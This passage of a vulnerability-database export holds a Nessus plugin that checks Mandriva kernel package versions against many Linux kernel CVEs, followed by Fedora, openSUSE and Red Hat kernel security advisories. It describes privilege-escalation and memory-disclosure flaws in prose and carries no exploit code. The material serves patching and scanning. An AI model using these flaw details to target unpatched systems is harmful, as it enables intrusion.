3.8.9, as used in a certain Motorola build of\nAndroid 4.1.2 and other products, allows local users to create a\nread-write memory mapping for the entirety of kernel memory, and\nconsequently gain privileges, via crafted /dev/graphics/fb0 mmap2\nsystem calls, as demonstrated by the Motochopper pwn program.\n(CVE-2013-2596)\n\narch/x86/kernel/cpu/perf_event_intel.c in the Linux kernel before\n3.8.9, when the Performance Events Subsystem is enabled, specifies an\nincorrect bitmask, which allows local users to cause a denial of\nservice (general protection fault and system crash) by attempting to\nset a reserved bit. (CVE-2013-2146)\n\nThe perf_swevent_init function in kernel/events/core.c in the Linux\nkernel before 3.8.9 uses an incorrect integer data type, which allows\nlocal users to gain privileges via a crafted perf_event_open system\ncall. (CVE-2013-2094)\n\nThe ioapic_read_indirect function in virt/kvm/ioapic.c in the Linux\nkernel through 3.8.4 does not properly handle a certain combination of\ninvalid IOAPIC_REG_SELECT and IOAPIC_REG_WINDOW operations, which\nallows guest OS users to obtain sensitive information from host OS\nmemory or cause a denial of service (host OS OOPS) via a crafted\napplication. (CVE-2013-1798)\n\nUse-after-free vulnerability in arch/x86/kvm/x86.c in the Linux kernel\nthrough 3.8.4 allows guest OS users to cause a denial of service (host\nOS memory corruption) or possibly have unspecified other impact via a\ncrafted application that triggers use of a guest physical address\n(GPA) in (1) movable or (2) removable memory during an\nMSR_KVM_SYSTEM_TIME kvm_set_msr_common operation. (CVE-2013-1797)\n\nThe kvm_set_msr_common function in arch/x86/kvm/x86.c in the Linux\nkernel through 3.8.4 does not ensure a required time_page alignment\nduring an MSR_KVM_SYSTEM_TIME operation, which allows guest OS users\nto cause a denial of service (buffer overflow and host OS memory\ncorruption) or possibly have unspecified other impact via a crafted\napplication. (CVE-2013-1796)\n\nThe do_tkill function in kernel/signal.c in the Linux kernel before\n3.8.9 does not initialize a certain data structure, which allows local\nusers to obtain sensitive information from kernel memory via a crafted\napplication that makes a (1) tkill or (2) tgkill system call.\n(CVE-2013-2141)\n\nHeap-based buffer overflow in the tg3_read_vpd function in\ndrivers/net/ethernet/broadcom/tg3.c in the Linux kernel before 3.8.6\nallows physically proximate attackers to cause a denial of service\n(system crash) or possibly execute arbitrary code via crafted firmware\nthat specifies a long string in the Vital Product Data (VPD) data\nstructure. (CVE-2013-1929)\n\nThe main function in tools/hv/hv_kvp_daemon.c in hypervkvpd, as\ndistributed in the Linux kernel before 3.8-rc1, allows local users to\ncause a denial of service (daemon exit) via a crafted application that\nsends a Netlink message. NOTE: this vulnerability exists because of an\nincorrect fix for CVE-2012-2669. (CVE-2012-5532)\n\nThe udf_encode_fh function in fs/udf/namei.c in the Linux kernel\nbefore 3.6 does not initialize a certain structure member, which\nallows local users to obtain sensitive information from kernel heap\nmemory via a crafted application. (CVE-2012-6548)\n\nThe isofs_export_encode_fh function in fs/isofs/export.c in the Linux\nkernel before 3.6 does not initialize a certain structure member,\nwhich allows local users to obtain sensitive information from kernel\nheap memory via a crafted application. (CVE-2012-6549)\n\nnet/dcb/dcbnl.c in the Linux kernel before 3.8.4 does not initialize\ncertain structures, which allows local users to obtain sensitive\ninformation from kernel stack memory via a crafted application.\n(CVE-2013-2634)\n\nThe rtnl_fill_ifinfo function in net/core/rtnetlink.c in the Linux\nkernel before 3.8.4 does not initialize a certain structure member,\nwhich allows local users to obtain sensitive information from kernel\nstack memory via a crafted application. (CVE-2013-2635)\n\nfs/ext3/super.c in the Linux kernel before 3.8.4 uses incorrect\narguments to functions in certain circumstances related to printk\ninput, which allows local users to conduct format-string attacks and\npossibly gain privileges via a crafted application. (CVE-2013-1848)\n\nThe flush_signal_handlers function in kernel/signal.c in the Linux\nkernel before 3.8.4 preserves the value of the sa_restorer field\nacross an exec operation, which makes it easier for local users to\nbypass the ASLR protection mechanism via a crafted application\ncontaining a sigaction system call. (CVE-2013-0914)\n\nHeap-based buffer overflow in the wdm_in_callback function in\ndrivers/usb/class/cdc-wdm.c in the Linux kernel before 3.8.4 allows\nphysically proximate attackers to cause a denial of service (system\ncrash) or possibly execute arbitrary code via a crafted cdc-wdm USB\ndevice. (CVE-2013-1860)\n\nRace condition in the install_user_keyrings function in\nsecurity/keys/process_keys.c in the Linux kernel before 3.8.3 allows\nlocal users to cause a denial of service (NULL pointer dereference and\nsystem crash) via crafted keyctl system calls that trigger keyring\noperations in simultaneous threads. (CVE-2013-1792)\n\nThe report API in the crypto user configuration API in the Linux\nkernel through 3.8.2 uses an incorrect C library function for copying\nstrings, which allows local users to obtain sensitive information from\nkernel stack memory by leveraging the CAP_NET_ADMIN capability.\n(CVE-2013-2546)\n\nThe crypto_report_one function in crypto/crypto_user.c in the report\nAPI in the crypto user configuration API in the Linux kernel through\n3.8.2 does not initialize certain structure members, which allows\nlocal users to obtain sensitive information from kernel heap memory by\nleveraging the CAP_NET_ADMIN capability. (CVE-2013-2547)\n\nThe crypto_report_one function in crypto/crypto_user.c in the report\nAPI in the crypto user configuration API in the Linux kernel through\n3.8.2 uses an incorrect length value during a copy operation, which\nallows local users to obtain sensitive information from kernel memory\nby leveraging the CAP_NET_ADMIN capability. (CVE-2013-2548)\n\nThe translate_desc function in drivers/vhost/vhost.c in the Linux\nkernel before 3.7 does not properly handle cross-region descriptors,\nwhich allows guest OS users to obtain host OS privileges by leveraging\nKVM guest OS privileges. (CVE-2013-0311)\n\nArray index error in the __sock_diag_rcv_msg function in\nnet/core/sock_diag.c in the Linux kernel before 3.7.10 allows local\nusers to gain privileges via a large family value in a Netlink\nmessage. (CVE-2013-1763)\n\nThe __skb_recv_datagram function in net/core/datagram.c in the Linux\nkernel before 3.8 does not properly handle the MSG_PEEK flag with\nzero-length data, which allows local users to cause a denial of\nservice (infinite loop and system hang) via a crafted application.\n(CVE-2013-0290)\n\nUse-after-free vulnerability in the shmem_remount_fs function in\nmm/shmem.c in the Linux kernel before 3.7.10 allows local users to\ngain privileges or cause a denial of service (system crash) by\nremounting a tmpfs filesystem without specifying a required mpol (aka\nmempolicy) mount option. (CVE-2013-1767)\n\nThe xen_iret function in arch/x86/xen/xen-asm_32.S in the Linux kernel\nbefore 3.7.9 on 32-bit Xen paravirt_ops platforms does not properly\nhandle an invalid value in the DS segment register, which allows guest\nOS users to gain guest OS privileges via a crafted application.\n(CVE-2013-0228)\n\nMemory leak in drivers/net/xen-netback/netback.c in the Xen netback\nfunctionality in the Linux kernel before 3.7.8 allows guest OS users\nto cause a denial of service (memory consumption) by triggering\ncertain error conditions. (CVE-2013-0217)\n\nThe Xen netback functionality in the Linux kernel before 3.7.8 allows\nguest OS users to cause a denial of service (loop) by triggering ring\npointer corruption. (CVE-2013-0216)\n\nThe __tun_chr_ioctl function in drivers/net/tun.c in the Linux kernel\nbefore 3.6 does not initialize a certain structure, which allows local\nusers to obtain sensitive information from kernel stack memory via a\ncrafted application. (CVE-2012-6547)\n\nThe updated packages provides a solution for these security issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:cpupower\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64cpupower-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64cpupower0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"cpupower-3.4.47-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"kernel-firmware-3.4.47-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"kernel-headers-3.4.47-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"kernel-server-3.4.47-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"kernel-server-devel-3.4.47-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"kernel-source-3.4.47-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64cpupower-devel-3.4.47-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64cpupower0-3.4.47-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"perf-3.4.47-1.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-1763"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-02-27T02:30:12", "published": "2013-02-27T02:30:12", "id": "FEDORA:2DA2A20783", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: kernel-3.7.9-205.fc18", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-1763", "CVE-2013-1767"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-03-02T19:55:59", "published": "2013-03-02T19:55:59", "id": "FEDORA:E955220909", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: kernel-3.8.1-201.fc18", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-1763", "CVE-2013-1767", "CVE-2013-1792", "CVE-2013-1825", "CVE-2013-1828"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-03-11T01:24:13", "published": "2013-03-11T01:24:13", "id": "FEDORA:93F5A20E0E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: kernel-3.8.2-206.fc18", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-0913", "CVE-2013-0914", "CVE-2013-1763", "CVE-2013-1767", "CVE-2013-1792", "CVE-2013-1828"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-03-17T01:07:34", "published": "2013-03-17T01:07:34", "id": "FEDORA:D141D21DDE", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: kernel-3.8.3-201.fc18", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-0913", "CVE-2013-0914", "CVE-2013-1763", "CVE-2013-1767", "CVE-2013-1792", "CVE-2013-1828", "CVE-2013-1860"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-03-19T20:06:30", "published": "2013-03-19T20:06:30", "id": "FEDORA:49FE4218C6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: kernel-3.8.3-203.fc18", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-0913", "CVE-2013-0914", "CVE-2013-1763", "CVE-2013-1767", "CVE-2013-1792", "CVE-2013-1796", "CVE-2013-1797", "CVE-2013-1798", "CVE-2013-1828", "CVE-2013-1860", "CVE-2013-1873"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-03-23T23:58:27", "published": "2013-03-23T23:58:27", "id": "FEDORA:45F8621614", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: kernel-3.8.4-202.fc18", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-0913", "CVE-2013-0914", "CVE-2013-1763", "CVE-2013-1767", "CVE-2013-1792", "CVE-2013-1796", "CVE-2013-1797", "CVE-2013-1798", "CVE-2013-1828", "CVE-2013-1860", "CVE-2013-1873", "CVE-2013-1929"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-04-19T04:59:13", "published": "2013-04-19T04:59:13", "id": "FEDORA:455A22792E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: kernel-3.8.8-202.fc18", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4131", "CVE-2012-0957", "CVE-2012-2372", "CVE-2012-2390", "CVE-2012-3412", "CVE-2012-3520", "CVE-2012-4461", "CVE-2012-4508", "CVE-2012-4530", "CVE-2012-4565", "CVE-2013-0190", "CVE-2013-0216", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-1763"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-03-02T20:02:58", "published": "2013-03-02T20:02:58", "id": "FEDORA:8F36120DDE", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: kernel-3.7.9-104.fc17", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-0913", "CVE-2013-0914", "CVE-2013-1763", "CVE-2013-1767", "CVE-2013-1792", "CVE-2013-1796", "CVE-2013-1797", "CVE-2013-1798", "CVE-2013-1828", "CVE-2013-1860", "CVE-2013-1873", "CVE-2013-1929"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-04-11T23:33:52", "published": "2013-04-11T23:33:52", "id": "FEDORA:D33BC210C9", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: kernel-3.8.6-203.fc18", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4131", "CVE-2012-0957", "CVE-2012-2372", "CVE-2012-2390", "CVE-2012-3412", "CVE-2012-3520", "CVE-2012-4461", "CVE-2012-4508", "CVE-2012-4530", "CVE-2012-4565", "CVE-2013-0190", "CVE-2013-0216", "CVE-2013-0228", "CVE-2013-0290", "CVE-2013-0913", "CVE-2013-0914", "CVE-2013-1763", "CVE-2013-1767", "CVE-2013-1792", "CVE-2013-1819", "CVE-2013-1828", "CVE-2013-1860"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2013-03-22T00:20:31", "published": "2013-03-22T00:20:31", "id": "FEDORA:813C021894", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: kernel-3.8.3-103.fc17", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:40:21", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0160", "CVE-2013-1763", "CVE-2013-0231", "CVE-2013-0216", "CVE-2012-5374"], "description": "The Linux kernel was updated to 3.4.33 and to fix a local\n root privilege escalation and various other security and\n non-security bugs.\n\n CVE-2013-1763: A out of bounds access in sock_diag could be\n used by local attackers to execute code in kernel context\n and so become root.\n\n CVE-2013-0160: The atime of /dev/ptmx is no longer updated,\n avoiding side channel attacks via user typing speed.\n\n CVE-2012-5374: Denial of service via btrfs hashes could\n have been used by local attackers to cause a compute denial\n of service.\n\n CVE-2013-0216: Fixed a problem in XEN netback: shutdown the\n ring if it contains garbage.\n\n CVE-2013-0231: Fixed a problem in XEN pciback: rate limit\n error messages from xen_pcibk_enable_msi(x).\n\n", "edition": 1, "modified": "2013-03-05T17:04:25", "published": "2013-03-05T17:04:25", "id": "OPENSUSE-SU-2013:0395-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00004.html", "type": "suse", "title": "kernel: fixed local privilege escalation (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:47:07", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4542", "CVE-2013-0268", "CVE-2013-0290", "CVE-2013-0871", "CVE-2013-1763"], "description": "The kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A flaw was found in the way file permission checks for the\n\"/dev/cpu/[x]/msr\" files were performed in restricted root environments\n(for example, when using a capability-based security model). A local user\nwith the ability to write to these files could use this flaw to escalate\ntheir privileges to kernel level, for example, by writing to the\nSYSENTER_EIP_MSR register. (CVE-2013-0268, Important)\n\n* A race condition was found in the way the Linux kernel's ptrace\nimplementation handled PTRACE_SETREGS requests when the debuggee was woken\ndue to a SIGKILL signal instead of being stopped. A local, unprivileged\nuser could use this flaw to escalate their privileges. (CVE-2013-0871,\nImportant)\n\n* An out-of-bounds access flaw was found in the way SOCK_DIAG_BY_FAMILY\nNetlink messages were processed in the Linux kernel. A local, unprivileged\nuser could use this flaw to escalate their privileges. (CVE-2013-1763,\nImportant)\n\n* It was found that the default SCSI command filter does not accommodate\ncommands that overlap across device classes. A privileged guest user could\npotentially use this flaw to write arbitrary data to a LUN that is\npassed-through as read-only. (CVE-2012-4542, Moderate)\n\n* A flaw was found in the way the __skb_recv_datagram() function in the\nLinux kernel processed payload-less socket buffers (skb) when the MSG_PEEK\noption was requested. A local, unprivileged user could use this flaw to\ncause a denial of service (infinite loop). (CVE-2013-0290, Moderate)\n\nThe CVE-2012-4542 issue was discovered by Paolo Bonzini of Red Hat.\n\nThis update also fixes the following bugs:\n\n* There was high contention on run-queue lock when load balancing before\nidling, causing latency spikes on high CPU core count systems. With this\nupdate, IPI is used to send notification to cores with pending work, and\nthe cores push the work rather than trying to pull it, resolving this\nissue. (BZ#858396)\n\n* Previously, ACPI lock was converted to an rt_mutex, leading to a\ntraceback when scheduling while atomic. With this update, ACPI lock has\nbeen converted back to a raw spinlock. (BZ#909965)\n\n* Fibre Channel (FC)/iSCSI device state was set to off-line and after a\ntimeout, not set back to running. Such a device would not come back online\nafter a fast_io_fail or timeout. With this update, an explicit check for\nthe device being offline has been added, and the device is set back to\nrunning when re-initializing, allowing devices to recover after a failure\nor timeout. (BZ#912942)\n\nUsers should upgrade to these updated packages, which correct these issues.\nThe system must be rebooted for this update to take effect.\n", "modified": "2018-06-07T08:58:22", "published": "2013-03-11T04:00:00", "id": "RHSA-2013:0622", "href": "https://access.redhat.com/errata/RHSA-2013:0622", "type": "redhat", "title": "(RHSA-2013:0622) Important: kernel-rt security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}